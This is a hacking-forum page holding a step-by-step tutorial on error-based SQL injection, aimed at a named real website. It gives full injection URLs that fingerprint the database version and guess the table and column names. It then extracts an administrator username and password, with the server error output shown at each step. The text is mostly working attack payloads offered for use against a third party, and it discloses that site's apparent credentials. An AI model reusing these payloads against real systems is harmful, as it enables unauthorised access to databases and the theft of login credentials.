XtGem Forum catalog
HomeFAT2ApplygameMusicMay bayMuxic-AttackVideoAutoPro-ElectronicsCode QRPRO-LED9box.vnImagesgraphicgraphicriverbrusheezyaction1action2Vectorvector cnIMAGES DONGCamera360photovisi3N3RflickrUpload IMGUpload IMG sizeDomai cuto000webhosthostingerNethuy hieuyahooSMS FreeLinkmatriuxwapmasterkhai thác sqlXSS ScannerBroken LinkPassword Hash pass-hashhash-vipmd5md5-1string-md5string-hex.Công cụ hackGet-code=md5Get-code-md51hashcrackFind ip site*;html.jpgHide siteToolfsymbolslunicodesmileycodesᎱᎬᏜᎱKool texteditor pixsound.midIconicon mousecodeHide codeMã hóa codeBase 64Mã hóa Base64WifiHacking-DNAShellShell+aspshell+philiplocalError-LocalKỹ thuật tấn công XSSsqliHexFind-XSSFind-AdminFind-shellghost-shellRoot-Kitswfflash Anonymousweb-hackjavascriptUsenameSoftware PCSoftware-1Software-2Phần mềm #EXE-EditorNetBeans C++ JavarFontdaypic.rukeyProshowPM-Game-mobilePM-Game-mobilelenhCommon

ERROR BASED SQL INJECTION 

Injecting site with 4 Columns

SQL INJECTION WHERE THE VERSION IS LESS THAN 5.Hello,all ! Today i’m going to teach you how to inject a website, that has version less than 5. Special thankx to my dearest Luge Racer Bro.

Lets start.As example,i’m taking this site.

http://www.ultimatehomedesign.com/news-detail.php?id=312

NOTE: Don’t step ahead if you don’t know UNION BASED Sql injection.

Getting Version

Now,lets check the version with error based query.

+or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1–

Version : Duplicate entry ’4.1.22-standard~1′ for key 1

Getting Tables

This site don’t have information_schema. The version is less than 5. We have to guess the table names.

This should be our syntax to guess the tables.

or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Now he we have to guess table name with this syntax. Some tables that usually contains login data :

adminamdinstatortbl_admintbl_adminstatorloginmemberuseruserstable_userssettings

Now i’m trying to guess table name with the syntax.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

I tried to guess admin table. There is no table in the database namedadmin.

So error came up :

Table ‘uhd.admin’ doesn’t exist

Lets try to guess another table.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Again error came up. There is no table in the database named adminstator

So error came up :

Table ‘uhd.adminstator’ doesn’t exist

Lets try with another table :

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

So users table exists.

No error came up :

Duplicate entry ’1~1′ for key 1

Getting ColumnsNow,we have to guess column name. So syntax to get columns should be like this :

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Username is the most common table. Lets try with it.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Error came up. The column doesn’t exist :(

Unknown column ‘username’ in ‘field list’

Lets try to guess another column user_name.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Now the site loads good. That means user_name exists.

Now try to guess the password column. Lets try with user_pass.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Extracting data from columnsTo get data from columns,our syntax should be this :

or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Some times, this query don’t works,as this query don’t works on this site. We have to use substring.

Getting Username:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

With this subtrinquery function we can combine a complex question. This query attempts to retrieve the name database of a database table. One character at a time. The substing function will return the first character of query’s result

The username cames up in the query :

Duplicate entry ‘root~1′ for key 1

Getting Password:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

Password came up :

Duplicate entry ‘trump123~1′ for key 1